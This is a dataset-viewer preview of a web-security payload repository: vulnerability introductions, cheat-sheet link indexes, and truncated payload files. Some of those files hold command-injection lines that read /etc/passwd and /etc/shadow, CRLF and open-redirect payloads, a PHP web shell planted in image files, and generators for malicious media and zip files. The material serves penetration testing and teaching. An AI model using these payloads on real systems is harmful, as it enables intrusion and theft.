Dataset Viewer
Auto-converted to Parquet Duplicate
text
stringlengths
102
3.08k
File: DISCLAIMER.md Category: pat # DISCLAIMER The authors and contributors of this repository disclaim any and all responsibility for the misuse of the information, tools, or techniques described herein. The content is provided solely for educational and research purposes. Users are strictly advised to utilize this ...
File: CONTRIBUTING.md Category: pat # CONTRIBUTING PayloadsAllTheThings' Team :heart: pull requests. Feel free to improve with your payloads and techniques ! You can also contribute with a :beers: IRL, or using the [sponsor](https://github.com/sponsors/swisskyrepo) button. ## Pull Requests Guidelines In order to ...
File: README.md Category: pat # Payloads All The Things A list of useful payloads and bypasses for Web Application Security. Feel free to improve with your payloads and techniques! You can also contribute with a :beers: IRL, or using the sponsor button. [![Sponsor](https://img.shields.io/static/v1?label=Sponsor&mes...
File: BOOKS.md Category: _LEARNING_AND_SOCIALS # Books > Grab a book and relax. Some of the best books in the industry. **Wiley**: - [Advanced Penetration Testing: Hacking the World's Most Secure Networks by Wil Allsopp (2017)](https://www.goodreads.com/book/show/32027337-advanced-penetration-testing) - [Android Ha...
File: YOUTUBE.md Category: _LEARNING_AND_SOCIALS # Youtube > Discover the best YouTube channels, must-watch conference talks, and handpicked videos on information security. ## Channels - [0xdf](https://www.youtube.com/@0xdf) - [Assetnote - Surfacing Security Podcast](https://www.youtube.com/@assetnote2016) - [Bug B...
File: TWITTER.md Category: _LEARNING_AND_SOCIALS # Twitter > Twitter is very common in the InfoSec area. Many advices and tips on bug hunting or CTF games are posted every day. It is worth following the feeds of some successful security researchers and hackers. ## Accounts - [@0xReconless - Security research, blogs...
File: README.md Category: Web Cache Deception # Web Cache Deception > Web Cache Deception (WCD) is a security vulnerability that occurs when a web server or caching proxy misinterprets a client's request for a web resource and subsequently serves a different resource, which may often be more sensitive or private, aft...
File: param_miner_lowercase_headers.txt Category: Intruders accept accept-application accept-charset accepted accept-encoding accept-encodxng accept-language accept-ranges accept-version access-control-allow-credentials access-control-allow-headers access-control-allow-methods access-control-allow-origin access-contro...
File: README.md Category: Server Side Include Injection # Server Side Include Injection > Server Side Includes (SSI) are directives that are placed in HTML pages and evaluated on the server while the pages are being served. They let you add dynamically generated content to an existing HTML page, without having to ser...
File: ssi_esi.txt Category: Files <!--#config errmsg="File not found, informs users and password"--> <!--#config timefmt="A %B %d %Y %r"--> <!--#echo var="DATE_LOCAL" --> <!--#echo var="DOCUMENT_NAME" --> <!--#echo var="DOCUMENT_URI" --> <!--#echo var="auth_type" --> <!--#echo var="content_length" --> <!--#echo var="c...
File: Reverse Shell Cheatsheet.md Category: Methodology and Resources # Reverse Shell Cheat Sheet :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheet/shell-reverse](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/) - [Tools](https://swisskyrepo.gi...
File: Windows - Mimikatz.md Category: Methodology and Resources # Windows - Mimikatz :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mimikatz](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mimikatz-cheatsheet/) - [Execute commands](https://swisskyrepo.github.io/Int...
File: Network Pivoting Techniques.md Category: Methodology and Resources # Network Pivoting Techniques :warning: Content of this page has been moved to [InternalAllTheThings/redteam/pivoting/network-pivoting-techniques](https://swisskyrepo.github.io/InternalAllTheThings/redteam/pivoting/network-pivoting-techniques/) ...
File: Windows - DPAPI.md Category: Methodology and Resources # Windows - DPAPI :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-dpapi](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-dpapi/) - [List Credential Files](https://swisskyrepo.github....
File: Powershell - Cheatsheet.md Category: Methodology and Resources # Powershell :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/powershell](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/powershell-cheatsheet/) - [Execution Policy](https://swisskyrepo.github.io/In...
File: Linux - Evasion.md Category: Methodology and Resources # Linux - Evasion :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/linux-evasion/) - [File names](https://swisskyrepo.github.io/Internal...
File: Container - Docker Pentest.md Category: Methodology and Resources # Container - Docker :warning: Content of this page has been moved to [InternalAllTheThings/containers/docker](https://swisskyrepo.github.io/InternalAllTheThings/containers/docker/) - [Tools](https://swisskyrepo.github.io/InternalAllTheThings/co...
File: Linux - Persistence.md Category: Methodology and Resources # Linux - Persistence :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/linux-persistence/) - [Basic reverse shell](https...
File: Container - Kubernetes Pentest.md Category: Methodology and Resources # Container - Kubernetes :warning: Content of this page has been moved to [InternalAllTheThings/containers/kubernetes/](https://swisskyrepo.github.io/InternalAllTheThings/containers/kubernetes/) - [Tools](https://swisskyrepo.github.io/Intern...
File: Bind Shell Cheatsheet.md Category: Methodology and Resources # Bind Shell :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/shell-bind](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/) - [Perl](https://swisskyrepo.github.io/InternalAllTheTh...
File: Windows - Defenses.md Category: Methodology and Resources # Windows - Defenses :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-defenses](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-defenses/) - [AppLocker](https://swisskyrepo.github....
File: MSSQL Server - Cheatsheet.md Category: Methodology and Resources # MSSQL Server :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/mssql-server-cheatsheet](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/mssql-server-cheatsheet/) - [Tools](https://swisskyrepo.gith...
File: Windows - Using credentials.md Category: Methodology and Resources # Windows - Using credentials :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-using-credentials](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-using-credentials/) - [Get ...
File: Linux - Privilege Escalation.md Category: Methodology and Resources # Linux - Privilege Escalation :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/linux-persistence](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/) - [...
File: Windows - AMSI Bypass.md Category: Methodology and Resources # Windows - AMSI Bypass :warning: Content of this page has been moved to [InternalAllTheThings/redteam/evasion/windows-amsi-bypass](https://swisskyrepo.github.io/InternalAllTheThings/redteam/evasion/windows-amsi-bypass/) - [List AMSI Providers](https...
File: Hash Cracking.md Category: Methodology and Resources # Hash Cracking :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/hash-cracking](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/hash-cracking/) - [Hashcat](https://swisskyrepo.github.io/InternalAllTheThings/ch...
File: Source Code Management.md Category: Methodology and Resources # Source Code Management & CI/CD Compromise :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/source-code-management-ci](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/source-code-management-ci/) - [C...
File: Metasploit - Cheatsheet.md Category: Methodology and Resources # Metasploit :warning: Content of this page has been moved to [InternalAllTheThings/command-control/metasploit](https://swisskyrepo.github.io/InternalAllTheThings/command-control/metasploit/) - [Installation](https://swisskyrepo.github.io/InternalA...
File: Windows - Privilege Escalation.md Category: Methodology and Resources # Windows - Privilege Escalation :warning: Content of this page has been moved to [InternalAllTheThings/redteam/escalation/windows-privilege-escalation](https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/windows-privilege-e...
File: Vulnerability Reports.md Category: Methodology and Resources # Vulnerability Reports :warning: Content of this page has been moved to [InternalAllTheThings/methodology/vulnerability-reports](https://swisskyrepo.github.io/InternalAllTheThings/methodology/vulnerability-reports/) - [Tools](https://swisskyrepo.git...
File: HTML Smuggling.md Category: Methodology and Resources # HTML Smuggling :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/html-smuggling](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/html-smuggling/) - [Description](https://swisskyrepo.github.io/InternalA...
File: Initial Access.md Category: Methodology and Resources # Initial Access :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/initial-access](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/initial-access/) - [Complex Chains](https://swisskyrepo.github.io/Intern...
File: Windows - Persistence.md Category: Methodology and Resources # Windows - Persistence :warning: Content of this page has been moved to [InternalAllTheThings/redteam/persistence/windows](https://swisskyrepo.github.io/InternalAllTheThings/redteam/persistence/windows-persistence/) - [Tools](https://swisskyrepo.git...
File: Cloud - Azure Pentest.md Category: Methodology and Resources # Cloud - Azure :warning: Content of this page has been moved to [InternalAllTheThings/cloud/azure](https://github.com/swisskyrepo/InternalAllTheThings/) - [Azure AD Connect](https://swisskyrepo.github.io/InternalAllTheThings/cloud/azure/azure-ad-con...
File: Office - Attacks.md Category: Methodology and Resources # Office - Attacks :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/office-attacks](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/office-attacks/) - [Office Products Features](https://swisskyrepo.gi...
File: Escape Breakout.md Category: Methodology and Resources # Application Escape and Breakout :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/escape-breakout](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/escape-breakout/) - [Gaining a command shell](https://swiss...
File: Web Attack Surface.md Category: Methodology and Resources # Subdomains Enumeration :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/web-attack-surface](https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/redteam/access/web-attack-surface.md) - [Enumerate Subd...
File: Windows - Download and Execute.md Category: Methodology and Resources # Windows - Download and execute methods :warning: Content of this page has been moved to [InternalAllTheThings/redteam/access/windows-download-execute](https://swisskyrepo.github.io/InternalAllTheThings/redteam/access/windows-download-execut...
File: Cloud - AWS Pentest.md Category: Methodology and Resources # Cloud - AWS :warning: Content of this page has been moved to [InternalAllTheThings/cloud/aws](https://github.com/swisskyrepo/InternalAllTheThings/) - [Cloud - AWS](https://swisskyrepo.github.io/InternalAllTheThings/cloud/aws/AWS%20Pentest/) - [AWS - ...
File: Network Discovery.md Category: Methodology and Resources # Network Discovery :warning: Content of this page has been moved to [InternalAllTheThings/cheatsheets/network-discovery](https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/network-discovery/) - [Nmap](https://swisskyrepo.github.io/InternalAl...
File: Cobalt Strike - Cheatsheet.md Category: Methodology and Resources # Cobalt Strike :warning: Content of this page has been moved to [InternalAllTheThings/command-control/cobalt-strike](https://swisskyrepo.github.io/InternalAllTheThings/command-control/cobalt-strike/) - [Infrastructure](https://swisskyrepo.githu...
File: Active Directory Attack.md Category: Methodology and Resources # Active Directory Attacks :warning: Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/) - [Active Directory - Certificate Services](https://swisskyrepo.github.io/Inte...
File: Methodology and enumeration.md Category: Methodology and Resources # Bug Hunting Methodology and Enumeration :warning: Content of this page has been moved to [InternalAllTheThings/methodology/bug-hunting-methodology](https://swisskyrepo.github.io/InternalAllTheThings/methodology/bug-hunting-methodology/) ## Su...
File: README.md Category: CSV Injection # CSV Injection > Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the c...
File: README.md Category: Upload Insecure Files # Upload Insecure Files > Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code. ## Summary * [Tools](#tools) * [Me...
File: eicar.txt Category: EICAR X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
File: README.md Category: Configuration Apache .htaccess # .htaccess Uploading an .htaccess file to override Apache rule and execute PHP. "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerable server an .hta...
File: gen_avi_bypass.py Category: CVE FFmpeg HLS import struct import argparse AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\...
File: gen_xbin_avi.py Category: CVE FFmpeg HLS #!/usr/bin/env python3 from builtins import bytes from builtins import map from builtins import zip from builtins import range import struct import argparse import random import string AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\...
File: createGIFwithGlobalColorTable.php Category: Picture Compression <?php // createGIFwithGlobalColorTable.php $_file="example.gif"; $_payload="<?php evil();?>"; $_width=200; $_height=200; if(strlen($_payload)%3!=0){ echo "payload%3==0 !"; exit(); } $im = imagecreate($_width, $_height); $_hex=unpack('H*',$_payload)...
File: createCompressedPNG_110x110.php Category: Picture Compression <? header('Content-Type: image/png'); $p = array(0xA3, 0x9F, 0x67, 0xF7, 0x0E, 0x93, 0x1B, 0x23, 0xBE, 0x2C, 0x8A, 0xD0, 0x80, 0xF9, 0xE1, 0xAE, 0x22, 0xF6, 0xD9, 0x43, 0x5D, 0xFB, 0xAE, 0xCC, 0x5A, 0x01, 0xDC, 0xAA, 0x52, 0xD0, 0xB6, 0xEE, 0xBB, ...
File: createPNGwithPLTE.php Category: Picture Compression <?php //createPNGwithPLTE.php // bypass imageCreateFromPng and imagepng $_payload="<?php phpinfo()?> "; $_pay_len=strlen($_payload); if(strlen($_payload)%3!=0){ echo "payload%3==0 !"; exit(); } $width=$_pay_len/3; $height=20; //$im = imageCreateFromPng("ex...
File: createBulletproofJPG.py Category: Picture Compression #!/usr/bin/python """ Bulletproof Jpegs Generator Copyright (C) 2012 Damien "virtualabs" Cauquil This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by t...
File: python-generate-init.py Category: Configuration Python __init__.py # Generating "evil" zip file # Based on the work of Ajin Abraham # Vuln website : https://github.com/ajinabraham/bad_python_extract # More info : https://ajinabraham.com/blog/exploiting-insecure-file-extraction-in-python-for-code-execution # War...
File: Build_image_to_LFI.py Category: Picture Metadata from __future__ import print_function from PIL import Image # Shellcodes - Bypass included : Keyword Recognition : System, GET, php # --- How to use : http://localhost/shell.php?c=echo%20'<pre>';ls #shellcode = "<?=@`$_GET[c]`;" shellcode = "<?php system($_GET[...
File: generate.sh Category: CVE ZIP Symbolic Link ln -s /etc/passwd link zip --symlinks test.zip link
File: README.md Category: Race Condition # Race Condition > Race conditions may occur when a process is critically or unexpectedly dependent on the sequence or timings of other events. In a web application environment, where multiple requests can be processed at a given time, developers may leave concurrency to be ha...
File: README.md Category: Clickjacking # Clickjacking > Clickjacking is a type of web security vulnerability where a malicious website tricks a user into clicking on something different from what the user perceives, potentially causing the user to perform unintended actions without their knowledge or consent. Users a...
File: README.md Category: Command Injection # Command Injection > Command injection is a security vulnerability that allows an attacker to execute arbitrary commands inside a vulnerable application. ## Summary * [Tools](#tools) * [Methodology](#methodology) * [Basic Commands](#basic-commands) * [Chaining Co...
File: command-execution-unix.txt Category: Intruder &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt; &lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; &lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt; /index.html|id| ";id;" ';id;' ;id; ;id ;netstat -a; "|id|" ...
File: command_exec.txt Category: Intruder ` || | ; ' '" " "' & && %0a %0a%0d %0Acat%20/etc/passwd %0Aid %0a id %0a %0Aid%0A %0a ping -i 30 127.0.0.1 %0a %0A/usr/bin/id %0A/usr/bin/id%0A %2 -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' |ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #\" |ping -n 21 127.0.0.1 %20{${phpi...
File: README.md Category: CRLF Injection # Carriage Return Line Feed > CRLF Injection is a web security vulnerability that arises when an attacker injects unexpected Carriage Return (CR) (\r) and Line Feed (LF) (\n) characters into an application. These characters are used to signify the end of a line and the start o...
File: crlfinjection.txt Category: Files /%%0a0aSet-Cookie:crlf=injection /%0aSet-Cookie:crlf=injection /%0d%0aSet-Cookie:crlf=injection /%0dSet-Cookie:crlf=injection /%23%0aSet-Cookie:crlf=injection /%23%0d%0aSet-Cookie:crlf=injection /%23%0dSet-Cookie:crlf=injection /%25%30%61Set-Cookie:crlf=injection /%25%30aSet-Coo...
File: README.md Category: DNS Rebinding # DNS Rebinding > DNS rebinding changes the IP address of an attacker controlled machine name to the IP address of a target application, bypassing the [same-origin policy](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) and thus allowing the browser to...
File: README.md Category: ORM Leak # ORM Leak > An ORM leak vulnerability occurs when sensitive information, such as database structure or user data, is unintentionally exposed due to improper handling of ORM queries. This can happen if the application returns raw error messages, debug information, or allows attacker...
File: README.md Category: Open Redirect # Open URL Redirect > Un-validated redirects and forwards are possible when a web application accepts untrusted input that could cause the web application to redirect the request to a URL contained within untrusted input. By modifying untrusted URL input to a malicious site, an...
File: Open-Redirect-payloads.txt Category: Intruder //google.com/%2f.. //www.whitelisteddomain.tld@google.com/%2f.. ///google.com/%2f.. ///www.whitelisteddomain.tld@google.com/%2f.. ////google.com/%2f.. ////www.whitelisteddomain.tld@google.com/%2f.. https://google.com/%2f.. https://www.whitelisteddomain.tld@google.com...
File: open_redirect_wordlist.txt Category: Intruder /http://example.com /%5cexample.com /%2f%2fexample.com /example.com/%2f%2e%2e /http:/example.com /?url=http://example.com&next=http://example.com&redirect=http://example.com&redir=http://example.com&rurl=http://example.com /?url=//example.com&next=//example.com&redir...
File: openredirects.txt Category: Intruder /%09/example.com /%2f%2fexample.com /%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/ /%5cexample.com /%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d /.example.com //%09/example.com //%5cexample.com ///%09/example.com ///%5cexample.com ////%09/example.com ////%5cexample.com ////...
File: README.md Category: Brute Force Rate Limit # Brute Force & Rate Limit ## Summary * [Tools](#tools) * [Bruteforce](#bruteforce) * [Burp Suite Intruder](#burp-suite-intruder) * [FFUF](#ffuf) * [Rate Limit](#rate-limit) * [TLS Stack - JA3](#tls-stack---ja3) * [Network IPv4](#network-ipv4) * [N...
File: Python.md Category: Server Side Template Injection # Server Side Template Injection - Python > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious input into a server-side template, causing arbitrary code execution on the server. In Python, SSTI can occur ...
File: Elixir.md Category: Server Side Template Injection # Server Side Template Injection - Elixir > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Elixir, SSTI can occur...
File: Ruby.md Category: Server Side Template Injection # Server Side Template Injection - Ruby > Server-Side Template Injection (SSTI) is a vulnerability that arises when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In Ruby, SSTI can occur when ...
File: PHP.md Category: Server Side Template Injection # Server Side Template Injection - PHP > Server-Side Template Injection (SSTI) is a vulnerability that occurs when an attacker can inject malicious input into a server-side template, causing the template engine to execute arbitrary commands on the server. In PHP,...
File: JavaScript.md Category: Server Side Template Injection # Server Side Template Injection - JavaScript > Server-Side Template Injection (SSTI) occurs when an attacker can inject malicious code into a server-side template, causing the server to execute arbitrary commands. In the context of JavaScript, SSTI vulner...
File: Java.md Category: Server Side Template Injection # Server Side Template Injection - Java > Server-Side Template Injection (SSTI) is a security vulnerability that occurs when user input is embedded into server-side templates in an unsafe manner, allowing attackers to inject and execute arbitrary code. In Java, ...
File: README.md Category: Server Side Template Injection # Server Side Template Injection > Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placehol...
File: ASP.md Category: Server Side Template Injection # Server Side Template Injection - ASP.NET > Server-Side Template Injection (SSTI) is a class of vulnerabilities where an attacker can inject malicious input into a server-side template, causing the template engine to execute arbitrary code on the server. In the ...
File: README.md Category: Insecure Management Interface # Insecure Management Interface > Insecure Management Interface refers to vulnerabilities in administrative interfaces used for managing servers, applications, databases, or network devices. These interfaces often control sensitive settings and can have powerful...
File: springboot_actuator.txt Category: Intruder auditevents autoconfig beans caches conditions configprops dump env flyway health heapdump httptrace info integrationgraph jolokia logfile loggers liquibase metrics mappings prometheus scheduledtasks sessions shutdown threaddump trace actuator/auditevents actuator/autoc...
File: 4 - CSP Bypass.md Category: XSS Injection # CSP Bypass > A Content Security Policy (CSP) is a security feature that helps prevent cross-site scripting (XSS), data injection attacks, and other code-injection vulnerabilities in web applications. It works by specifying which sources of content (like scripts, style...
File: 3 - XSS Common WAF Bypass.md Category: XSS Injection # Common WAF Bypass > WAFs are designed to filter out malicious content by inspecting incoming and outgoing traffic for patterns indicative of attacks. Despite their sophistication, WAFs often struggle to keep up with the diverse methods attackers use to obfu...
File: 1 - XSS Filter Bypass.md Category: XSS Injection # XSS Filter Bypass ## Summary - [Bypass Case Sensitive](#bypass-case-sensitive) - [Bypass Tag Blacklist](#bypass-tag-blacklist) - [Bypass Word Blacklist with Code Evaluation](#bypass-word-blacklist-with-code-evaluation) - [Bypass with Incomplete HTML Tag](#bypa...
File: 2 - XSS Polyglot.md Category: XSS Injection # Polyglot XSS A polyglot XSS is a type of cross-site scripting (XSS) payload designed to work across multiple contexts within a web application, such as HTML, JavaScript, and attributes. It exploits the application’s inability to properly sanitize input in different ...
End of preview. Expand in Data Studio
README.md exists but content is empty.
Downloads last month
21